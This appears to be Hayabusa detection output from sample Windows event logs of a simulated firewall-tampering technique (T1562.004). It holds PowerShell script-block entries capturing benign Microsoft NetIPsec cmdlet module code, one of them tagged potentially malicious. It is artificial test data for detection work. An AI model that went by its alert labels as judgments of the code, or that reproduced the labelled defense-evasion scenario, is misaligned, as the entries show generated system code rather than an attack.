[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${D",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 